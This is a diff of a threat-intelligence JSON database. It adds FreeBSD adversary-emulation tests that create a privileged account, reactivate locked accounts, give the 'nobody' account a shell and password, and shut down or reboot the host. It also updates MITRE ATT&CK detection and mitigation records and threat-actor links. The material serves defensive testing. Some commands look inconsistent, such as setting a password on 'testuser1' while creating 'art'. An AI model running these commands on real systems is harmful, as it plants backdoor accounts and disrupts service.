@@ -692397,6 +694208,20 @@ "cleanup_command": "userdel -r art \n" } }, + { + "name": "Create local account (FreeBSD)", + "auto_generated_guid": "95158cc9-8f6d-4889-9531-9be3f7f095e0", + "description": "An adversary may wish to create an account with admin privileges to work with. In this test we create a \"art\" user with the password art, switch to art, execute whoami, exit and delete the art user.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n", + "cleanup_command": "rmuser -y art\n" + } + }, { "name": "Reactivate a locked/expired account (Linux)", "auto_generated_guid": "d2b95631-62d7-45a3-aaef-0972cea97931", @@ -692411,6 +694236,20 @@ "cleanup_command": "userdel -r art \n" } }, + { + "name": "Reactivate a locked/expired account (FreeBSD)", + "auto_generated_guid": "09e3380a-fae5-4255-8b19-9950be0252cf", + "description": "A system administrator may have locked and expired a user account rather than deleting it. \"the user is coming back, at some stage\" An adversary may reactivate a inactive account in an attempt to appear legitimate. \n\nIn this test we create a \"art\" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user testuser1 -h 0\npw lock art\npw usermod art -e +1d\npw unlock art\npw user mod art -e +99d\nsu art\nwhoami\nexit\n", + "cleanup_command": "rmuser -y art \n" + } + }, { "name": "Login as nobody (Linux)", "auto_generated_guid": "3d2cd093-ee05-41bd-a802-59ee5c301b85", @@ -692424,6 +694263,20 @@ "command": "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nchsh --shell /bin/bash nobody\nusermod --password $(openssl passwd -1 nobody) nobody\nsu nobody\nwhoami\nexit\n", "cleanup_command": "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" } + }, + { + "name": "Login as nobody (freebsd)", + "auto_generated_guid": "16f6374f-7600-459a-9b16-6a88fd96d310", + "description": "An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n", + "cleanup_command": "pw usermod nobody -s /usr/sbin/nologin\ncat /etc/passwd |grep nobody\n# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\n" + } } ] } @@ -694643,8 +696496,10 @@ "shutdown -h now\n", "reboot\n", "halt -p\n", + "halt -r\n", "halt --reboot\n", "poweroff\n", + "poweroff -r 3\n", "poweroff --reboot\n", "shutdown /l \n" ], @@ -694699,12 +696554,12 @@ } }, { - "name": "Restart System via `shutdown` - macOS/Linux", + "name": "Restart System via `shutdown` - FreeBSD/macOS/Linux", "auto_generated_guid": "6326dbc4-444b-4c04-88f4-27e94d0327cb", - "description": "This test restarts a macOS/Linux system.\n", + "description": "This test restarts a FreeBSD/macOS/Linux system.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "timeout": { @@ -694715,17 +696570,17 @@ }, "executor": { "command": "shutdown -r #{timeout}\n", - "name": "bash", + "name": "sh", "elevation_required": true } }, { - "name": "Shutdown System via `shutdown` - macOS/Linux", + "name": "Shutdown System via `shutdown` - FreeBSD/macOS/Linux", "auto_generated_guid": "4963a81e-a3ad-4f02-adda-812343b351de", - "description": "This test shuts down a macOS/Linux system using a halt.\n", + "description": "This test shuts down a FreeBSD/macOS/Linux system using a halt.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "timeout": { @@ -694736,34 +696591,47 @@ }, "executor": { "command": "shutdown -h #{timeout}\n", - "name": "bash", + "name": "sh", "elevation_required": true } }, { - "name": "Restart System via `reboot` - macOS/Linux", + "name": "Restart System via `reboot` - FreeBSD/macOS/Linux", "auto_generated_guid": "47d0b042-a918-40ab-8cf9-150ffe919027", - "description": "This test restarts a macOS/Linux system via `reboot`.\n", + "description": "This test restarts a FreeBSD/macOS/Linux system via `reboot`.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { "command": "reboot\n", - "name": "bash", + "name": "sh", "elevation_required": true } }, { - "name": "Shutdown System via `halt` - Linux", + "name": "Shutdown System via `halt` - FreeBSD/Linux", "auto_generated_guid": "918f70ab-e1ef-49ff-bc57-b27021df84dd", - "description": "This test shuts down a Linux system using `halt`.\n", + "description": "This test shuts down a FreeBSD/Linux system using `halt`.\n", "supported_platforms": [ "linux" ], "executor": { "command": "halt -p\n", - "name": "bash", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Reboot System via `halt` - FreeBSD", + "auto_generated_guid": "7b1cee42-320f-4890-b056-d65c8b884ba5", + "description": "This test restarts a FreeBSD system using `halt`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "halt -r\n", + "name": "sh", "elevation_required": true } }, @@ -694781,15 +696649,28 @@ } }, { - "name": "Shutdown System via `poweroff` - Linux", + "name": "Shutdown System via `poweroff` - FreeBSD/Linux", "auto_generated_guid": "73a90cd2-48a2-4ac5-8594-2af35fa909fa", - "description": "This test shuts down a Linux system using `poweroff`.\n", + "description": "This test shuts down a FreeBSD/Linux system using `poweroff`.\n", "supported_platforms": [ "linux" ], "executor": { "command": "poweroff\n", - "name": "bash", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Reboot System via `poweroff` - FreeBSD", + "auto_generated_guid": "5a282e50-86ff-438d-8cef-8ae01c9e62e1", + "description": "This test restarts a FreeBSD system using `poweroff`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "poweroff -r 3\n", + "name": "sh", "elevation_required": true } }, @@ -705044,7 +706925,7 @@ "id": "relationship--03f56095-464f-4c51-b6aa-11b1641f17cf", "type": "relationship", "created": "2022-03-30T14:26:51.850Z", - "modified": "2022-03-30T14:26:51.850Z", + "modified": "2023-11-06T20:20:10.986Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "relationship_type": "detects", @@ -705053,10 +706934,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions that may attempt to hide artifacts associated with their behaviors to evade detection.", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions that may attempt to hide artifacts associated with their behaviors to evade detection.", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, @@ -768301,7 +770182,7 @@ "id": "relationship--2610bdef-0b08-46a8-94f5-cf253f11e5fc", "type": "relationship", "created": "2022-03-30T14:26:51.876Z", - "modified": "2023-09-15T16:33:24.590Z", + "modified": "2023-11-10T18:22:01.595Z", "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", "target_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "relationship_type": "detects", @@ -768310,10 +770191,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nA web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gatway in a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment.\n\n

Analytic 1 - Webshell-Indicative Process Tree

\nsuspicious_processes = filter processes where (\n (parent_exe == \"w3wp.exe\" OR\n parent_exe == \"httpd.exe\" OR\n parent_exe == \"tomcat*.exe\" OR\n parent_exe == \"nginx.exe\" ) AND\n (exe == \"cmd.exe\" OR\n exe == \"powershell.exe\" OR\n exe == \"net.exe\" OR\n exe == \"whoami.exe\" OR\n exe == \"hostname.exe\" OR\n exe == \"systeminfo.exe\" OR\n exe == \"ipconfig.exe) )", + "description": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is very similar to the following short payload: (Citation: Lee 2013)\n\n``\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nA web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gatway in a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment.\n\n

Analytic 1 - Webshell-Indicative Process Tree

\nsuspicious_processes = filter processes where (\n (parent_exe == \"w3wp.exe\" OR\n parent_exe == \"httpd.exe\" OR\n parent_exe == \"tomcat*.exe\" OR\n parent_exe == \"nginx.exe\" ) AND\n (exe == \"cmd.exe\" OR\n exe == \"powershell.exe\" OR\n exe == \"net.exe\" OR\n exe == \"whoami.exe\" OR\n exe == \"hostname.exe\" OR\n exe == \"systeminfo.exe\" OR\n exe == \"ipconfig.exe) )", "x_mitre_deprecated": false, "x_mitre_version": "0.1", - "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [ { "source_name": "NSA Cyber Mitigating Web Shells", @@ -897093,7 +898974,7 @@ "id": "relationship--6b8ba493-b6f0-48d2-ba77-a23a76e555e7", "type": "relationship", "created": "2022-03-30T14:26:51.846Z", - "modified": "2022-03-30T14:26:51.846Z", + "modified": "2023-11-06T20:19:32.835Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "relationship_type": "detects", @@ -897102,10 +898983,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, @@ -898167,7 +900048,7 @@ "id": "relationship--6c3ee326-0ce4-449d-8073-3ee0e8185821", "type": "relationship", "created": "2022-03-30T14:26:51.850Z", - "modified": "2022-03-30T14:26:51.850Z", + "modified": "2023-11-06T20:20:41.652Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "relationship_type": "detects", @@ -898176,10 +900057,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions may set files and directories to be hidden to evade detection mechanisms.", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions may set files and directories to be hidden to evade detection mechanisms.", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, @@ -899993,9 +901874,9 @@ "id": "relationship--6d1cd674-0466-4209-b9b5-7ce45ed359d1", "type": "relationship", "created": "2020-11-09T16:28:37.751Z", - "modified": "2020-11-09T16:28:37.751Z", + "modified": "2023-11-06T20:13:28.203Z", "source_ref": "malware--edb24a93-1f7a-4bbf-a738-1397a14662c6", - "target_ref": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "relationship_type": "uses", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -900005,7 +901886,7 @@ "description": "[Astaroth](https://attack.mitre.org/software/S0373) has been delivered via malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)", "x_mitre_deprecated": false, "x_mitre_version": "1.0", - "x_mitre_attack_spec_version": "", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [ { "source_name": "Securelist Brazilian Banking Malware July 2020", @@ -943687,7 +945568,7 @@ "id": "relationship--845b89cf-287c-460e-a243-74229e61d856", "type": "relationship", "created": "2022-03-30T14:26:51.866Z", - "modified": "2022-03-30T14:26:51.866Z", + "modified": "2023-11-06T20:18:26.804Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "relationship_type": "detects", @@ -943696,10 +945577,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc that would aid in the manipulation of data to hide activity", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc that would aid in the manipulation of data to hide activity", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, @@ -976149,7 +978030,7 @@ "id": "relationship--95b3ea0a-9ecf-440d-8094-7d003ed3dcf6", "type": "relationship", "created": "2022-03-30T14:26:51.866Z", - "modified": "2022-04-16T19:41:17.130Z", + "modified": "2023-11-06T20:24:42.686Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", "relationship_type": "detects", @@ -976158,10 +978039,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/ower, permissions, etc.", + "description": "Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/owner, permissions, etc.", "x_mitre_deprecated": false, "x_mitre_version": "0.1", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, @@ -981713,7 +983594,7 @@ "id": "relationship--9879dc61-0fad-4e79-b225-9f529ee67d46", "type": "relationship", "created": "2022-03-30T14:26:51.863Z", - "modified": "2022-03-30T14:26:51.863Z", + "modified": "2023-11-06T20:23:59.763Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "relationship_type": "detects", @@ -981722,10 +983603,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, @@ -1009454,7 +1011335,7 @@ "id": "relationship--a735d1e1-10bf-42e7-aafd-222b4d24d581", "type": "relationship", "created": "2022-03-30T14:26:51.845Z", - "modified": "2022-03-30T14:26:51.845Z", + "modified": "2023-11-06T20:22:06.577Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", "relationship_type": "detects", @@ -1009463,10 +1011344,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, @@ -1053875,7 +1055756,7 @@ "id": "relationship--bfeb4a8f-eefd-440b-9719-26a77d71afd4", "type": "relationship", "created": "2022-03-30T14:26:51.859Z", - "modified": "2022-08-23T15:45:41.036Z", + "modified": "2023-11-06T20:22:48.411Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "relationship_type": "detects", @@ -1053884,10 +1055765,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.\n\nFile-based signatures may be capable of detecting code obfuscation depending on the methods used.(Citation: Huntress API Hash)(Citation: BlackHat API Packers)(Citation: MITRECND FindAPIHash)", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.\n\nFile-based signatures may be capable of detecting code obfuscation depending on the methods used.(Citation: Huntress API Hash)(Citation: BlackHat API Packers)(Citation: MITRECND FindAPIHash)", "x_mitre_deprecated": false, "x_mitre_version": "0.1", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [ { "source_name": "Huntress API Hash", @@ -1054745,7 +1056626,7 @@ "id": "relationship--c077dd0a-7568-400b-9aad-e0535f356f71", "type": "relationship", "created": "2021-07-22T22:35:46.142Z", - "modified": "2021-07-26T13:46:48.249Z", + "modified": "2023-11-10T18:21:43.379Z", "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31", "target_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "relationship_type": "mitigates", @@ -1054754,10 +1056635,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Consider disabling functions from web technologies such as PHP\u2019s eval() that may be abused for web shells.(Citation: ITSyndicate Disabling PHP functions)", + "description": "Consider disabling functions from web technologies such as PHP\u2019s `evaI()` that may be abused for web shells.(Citation: ITSyndicate Disabling PHP functions)", "x_mitre_deprecated": false, "x_mitre_version": "1.0", - "x_mitre_attack_spec_version": "", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [ { "source_name": "ITSyndicate Disabling PHP functions", @@ -1065989,7 +1067870,7 @@ "id": "relationship--c6dfa59f-88a0-4839-81ff-f4d8dd57696b", "type": "relationship", "created": "2022-03-30T14:26:51.857Z", - "modified": "2022-03-30T14:26:51.857Z", + "modified": "2023-11-06T20:21:17.840Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", "relationship_type": "detects", @@ -1065998,10 +1067879,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, may use NTFS file attributes to hide their malicious data in order to evade detection. Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA)", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, may use NTFS file attributes to hide their malicious data in order to evade detection. Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA)", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [ { "source_name": "Journey into IR ZeroAccess NTFS EA", @@ -1093805,7 +1095686,7 @@ "id": "relationship--d5d7b6eb-e4c3-4143-ae0d-41ebdeb2061f", "type": "relationship", "created": "2022-03-30T14:26:51.838Z", - "modified": "2022-03-30T14:26:51.838Z", + "modified": "2023-11-06T20:23:18.394Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "relationship_type": "detects", @@ -1093814,10 +1095695,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, @@ -1151331,7 +1153212,7 @@ "id": "relationship--f67b8650-0ebb-417f-a755-2e139796ec11", "type": "relationship", "created": "2022-03-30T14:26:51.841Z", - "modified": "2022-03-30T14:26:51.841Z", + "modified": "2023-11-06T20:17:55.635Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "relationship_type": "detects", @@ -1151340,10 +1153221,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc that would aid in the manipulation of data to hide activity", + "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc that would aid in the manipulation of data to hide activity", "x_mitre_deprecated": false, - "x_mitre_version": "", - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" }, @@ -1169968,7 +1171849,8 @@ "https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/", "https://blog-cert.opmd.fr/dnspionage-retour-factuel-sur-les-attaques-annoncees-dans-differents-medias/", "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html", - "https://www.trendmicro.com/en_no/research/23/i/apt34-deploys-phishing-attack-with-new-malware.html" + "https://www.trendmicro.com/en_no/research/23/i/apt34-deploys-phishing-attack-with-new-malware.html", + "https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/" ], "targets": [], "external_description": [], @@ -1174367,7 +1176249,9 @@ "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", "https://cert.gov.ua/article/39518", "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", - "https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-military-intelligence-officers-conducting-malicious-activity-against-u-s-critical-infrastructure/" + "https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-military-intelligence-officers-conducting-malicious-activity-against-u-s-critical-infrastructure/", + "https://cert.gov.ua/article/6123309", + "https://www.mandiant.com/resources/blog/sandworm-disrupts-power-ukraine-operational-technology" ], "targets": [ "This threat actor targets industrial control systems, using a tool called Black Energy, associated with electricity and power generation for espionage, denial of service, and data destruction purposes. Ukrainian energy sector, Eastern Europe. " @@ -1175215,7 +1177099,8 @@ "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a", "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", "https://www.group-ib.com/blog/muddywater-infrastructure/", - "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/" + "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/", + "https://www.deepinstinct.com/blog/muddywater-en-able-spear-phishing-with-new-ttps" ], "targets": [ "Israel,Academic Sector,individuals in Asia and the Middle East, government and defense entities in Central and Southwest Asia" @@ -1177656,10 +1179541,10 @@ "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "name": "File Metadata", "created": "2021-10-20T15:05:19.273Z", - "modified": "2021-10-20T15:05:19.273Z", + "modified": "2023-11-01T21:18:51.941Z", "x_mitre_version": "1.0", "type": "x-mitre-data-component", - "description": "Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "description": "Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", @@ -1177667,7 +1179552,7 @@ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "x_mitre_domains": [], - "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "revoked": false, "external_references": [] @@ -1180186,7 +1182071,9 @@ "links": [ "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain", "https://www.cyberscoop.com/saudi-arabia-hackers-it-providers-symantec/", - "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html" + "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html", + "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html", + "https://www.crowdstrike.com/blog/imperial-kitten-deploys-novel-malware-families/" ], "targets": [ "IT providers in Saudi Arabia" @@ -1181821,6 +1183708,7 @@ "Primitive Bear", "Trident Ursa", "Iron Tilden", + "Hive0051(IBM)", "G0047" ], "external_tools": [ @@ -1191714,5 +1193602,5 @@ ], "relationship_map": {}, "revoked": false, - "last_updated": "2023-11-01T03:05:33.256448+00:00" + "last_updated": "2023-11-15T03:05:35.476604+00:00" } \ No newline at end of file